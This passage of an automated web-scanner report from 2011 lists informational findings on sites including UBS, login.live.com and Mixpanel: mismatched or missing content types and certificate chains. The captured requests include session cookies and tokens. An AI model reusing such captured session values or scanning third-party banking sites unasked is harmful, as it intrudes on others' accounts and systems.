...IHDR...0...0......`n.... pHYs...H...H.F.k>... vpAg...0...0....W...7IDATX..X[l.U...efw.....E......... ...
.Z@!E..<.M...y......Z|...%.`...,.Zz..-.R"mh....vwfggg.9>L]I....y................B0.
...[SNIP]...

25.2. http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.twimg.com
Path:	/profile_images/336090389/CM_linkedin_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/336090389/CM_linkedin_normal.gif HTTP/1.1
Host: a1.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 15:39:20 GMT
Expires: Mon, 14 Jan 2019 19:51:34 GMT
Last-Modified: Tue, 28 Jul 2009 14:29:47 GMT
Cache-Control: max-age=252460800
Content-Type: image/gif
ETag: "6ded02a19e1b8a60037e577eea461a95"
Server: AmazonS3
X-Amz-Cf-Id: 8d29c451904da7f19a6683b477ac6fb6aab2e19c7f804b0daae2f20f70d6dbe67d627a1964a9ed31,84a89c105e189f9bc5a54542c8ac9bde01ae83bb0cde8c8c9784a69b42077f6ee2b2f7044958016a
x-amz-id-2: o2fpu5d6nDyo8DZLQrG2MvAByy1l9/DOmrCNerXyfgXBXGF1OqLf5OhYTusk5ZnB
x-amz-request-id: DE7E4591F30D3570
X-Cache: Miss from cloudfront
Content-Length: 5137

.PNG
.
...IHDR...0...0......`n.... pHYs...H...H.F.k>... vpAg...0...0....W....IDATX..Xi..Wy~..m...]..sg...N...N.'.c.Y!);.J.
TD+~...m.(.ZU.T....P......H..Rp.H..$^.x.K...~g..}.Y.....-....t...{..]..}.!.
...[SNIP]...

25.3. https://accountservices.passport.net/gethip.srf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://accountservices.passport.net
Path:	/gethip.srf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

25.4. http://api.mixpanel.com/track/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.mixpanel.com
Path:	/track/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9icm93c2VyIjogIkNocm9tZSIsIm1wX3BsYXRmb3JtIjogIldpbmRvd3MiLCJtcF9wYWdlIjogImh0dHA6Ly93d3cuYmViby5jb20vIiwidG9rZW4iOiAiOTYxMTBkM2JmZGI3YmM3ZmYwYzNjM2U0MDhkMDIyMmIiLCJ0aW1lIjogMTMwOTk1MTMwNH19&ip=1&callback=mpmetrics.jsonp_callback&_=1309951304288 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 06 Jul 2011 11:22:09 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Wed, 06 Jul 2011 11:22:08 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 28

mpmetrics.jsonp_callback(1);

25.5. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blogs.technet.com
Path:	/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

POST /b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx
Content-Length: 1104
Origin: http://blogs.technet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=173653f; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; omniID=1306444613329_0b6a_7430_ae20_acaad3f30011; s_cc=true; s_sq=%5B%5BB%5D%5D

ctl00$content$ctl00$ctl00=custom%3Aid%3Dfragment-4667%26renderFromCurrent%3DTrue%26callback_control_id%3Dctl00%2524content%2524ctl00%2524w_4667%2524_96404d%2524ctl00%2524ctl00%2524DelayedFeedbackList%
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Pingback: http://blogs.technet.com/b/microsoft_blog/pingback.aspx
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
server: VBDNET09
Date: Wed, 06 Jul 2011 11:20:26 GMT
Content-Length: 1395

s{'response':'<input type="hidden" name="ctl00$content$ctl00$w_4667$_96404d$ctl00$ctl00$DelayedFeedbackList" value="true:undefined" \/>\r\n \r\n \r\n ','includeScriptUrls':new Array('\/utility
...[SNIP]...

25.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

25.7. https://login.live.com/pp1100/RDHelper_JS.srf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://login.live.com
Path:	/pp1100/RDHelper_JS.srf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

25.8. https://manage.softlayer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://manage.softlayer.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

25.9. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://nae.ubs.com
Path:	/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg

Issue detail

The response contains the following Content-type statement:

content-type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Referer: https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instruments?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: image/jpeg
age: 30369
date: Wed, 06 Jul 2011 05:28:54 GMT
Content-Length: 4795
content-language: en
server: Proxy/1.0
last-modified: Wed, 17 Mar 2010 14:25:14 GMT

GIF89a........8M.;U.>X!=U!>Y.@Z#B\(E]$Ea%Hc'Nk(Fa*Jd-Mi.Ql.Rq.X}1Mg0Ni2Sm8Qf8Uo3Uq4Vx5Yt5[{8Wq9Yr9Zt9\s9\u<[u=\v;]y6`|=a|@^w@_x@azAb}Bd~EbzDc~Ed~3_.8^.7b.5c.<c.:e.?h.>i.=l.Be.Ch.Bh.Fh.Fi.Gl.Ck.Ih.Ij.I
...[SNIP]...

25.10. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://nae.ubs.com
Path:	/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg

Issue detail

The response contains the following Content-type statement:

content-type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg HTTP/1.1
Host: nae.ubs.com
Connection: keep-alive
Referer: https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instruments?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; NavLB_PQ=quotes-public1.ubs.com; ubslang=en-US; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309982088978:ss=1309981804815; NavLB_EB=ebanking2.ubs.com; PD-S-SESSION-ID=2_A7C3ZebL4esSGqSbaud57OPM7IqEBzFS2x-d1D1jkPtQxo0g

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: image/jpeg
age: 45446
date: Wed, 06 Jul 2011 01:17:40 GMT
Content-Length: 4870
content-language: en
server: Proxy/1.0
last-modified: Wed, 17 Mar 2010 14:25:14 GMT

GIF89a.........*..3..*
,.&6.$-.)3.2; .:"5<..B.3E./@.6D.<Q$5A$;D"8J+<D*>J.BK.AP#AL-BG,BL+HM"DR!HU-DP-KV-KZ1EN2HN3FQ3JS3MY9MT:NZ9R[.Ij4Tc1Xc;Va<Yc>\j<Tt>ft@V]@UbBZbA\jJ\eI^jE]rIbkEcrDizIdsLiuLk{SfkQeuS
...[SNIP]...

25.11. https://nae.ubs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://nae.ubs.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

content-type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

Response

25.12. http://s.bebo.com/js/mootools-core-and-more-1.3.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://s.bebo.com
Path:	/js/mootools-core-and-more-1.3.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

26. Content type is not specified previous next
There are 4 instances of this issue:

https://ebanking-us.ubs.com/safeloginu/Login
https://foton-ewm-de.ubs.com/safe-login/Login
https://foton-ewm-es.ubs.com/safe-login/Login
https://login.live.com/hiphelp.srf

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. https://ebanking-us.ubs.com/safeloginu/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ebanking-us.ubs.com
Path:	/safeloginu/Login

Request

GET /safeloginu/Login?handler=SAFEGetLogin&locale=en&SAFEGoto=https%3A%2F%2Febanking-us.ubs.com%2Fgepu%2FMainAction HTTP/1.1
Host: ebanking-us.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title
...[SNIP]...

26.2. https://foton-ewm-de.ubs.com/safe-login/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://foton-ewm-de.ubs.com
Path:	/safe-login/Login

Request

GET /safe-login/Login?handler=SAFEGetLogin HTTP/1.1
Host: foton-ewm-de.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

<html>
<head>
<title>UBS Web-Login</title>
<meta pageName='login-Login'>
<meta serviceTime='0'>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/static_safe/css/redesign_login.css" type="text/css" rel="stylesheet" />
...[SNIP]...

26.3. https://foton-ewm-es.ubs.com/safe-login/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://foton-ewm-es.ubs.com
Path:	/safe-login/Login

Request

GET /safe-login/Login?handler=SAFEGetLogin HTTP/1.1
Host: foton-ewm-es.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.4. https://login.live.com/hiphelp.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/hiphelp.srf

Request

GET /hiphelp.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/7.5
PPServer: PPV: 30 H: BAYIDSLGN1E29 V: 0
Date: Wed, 06 Jul 2011 11:21:10 GMT
Connection: close

404 Not Found

27. SSL certificate previous
There are 4 instances of this issue:

https://clientlogin.ibb.ubs.com/
https://login.live.com/
https://manage.softlayer.com/
https://onlineservices.ubs.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

27.1. https://clientlogin.ibb.ubs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://clientlogin.ibb.ubs.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	clientlogin.ibb.ubs.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Oct 17 19:00:00 CDT 2010
Valid to:	Thu Nov 17 17:59:59 CST 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

27.2. https://login.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	login.live.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Mon Oct 04 19:00:00 CDT 2010
Valid to:	Wed Oct 05 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

27.3. https://manage.softlayer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	manage.softlayer.com
Issued by:	GeoTrust Extended Validation SSL CA
Valid from:	Thu Feb 11 15:03:03 CST 2010
Valid to:	Fri Apr 13 13:40:54 CDT 2012

Certificate chain #1

Issued to:	GeoTrust Extended Validation SSL CA
Issued by:	GeoTrust Primary Certification Authority
Valid from:	Tue Nov 28 18:00:00 CST 2006
Valid to:	Mon Nov 28 17:59:59 CST 2016

Certificate chain #2

Issued to:	GeoTrust Primary Certification Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sun Nov 26 18:00:00 CST 2006
Valid to:	Tue Aug 21 11:15:00 CDT 2018

Certificate chain #3

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

27.4. https://onlineservices.ubs.com/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	onlineservices.ubs.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Tue Sep 28 19:00:00 CDT 2010
Valid to:	Sun Oct 23 18:59:59 CDT 2011

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

Report generated by XSS.CX at Sat Jul 09 06:00:32 CDT 2011.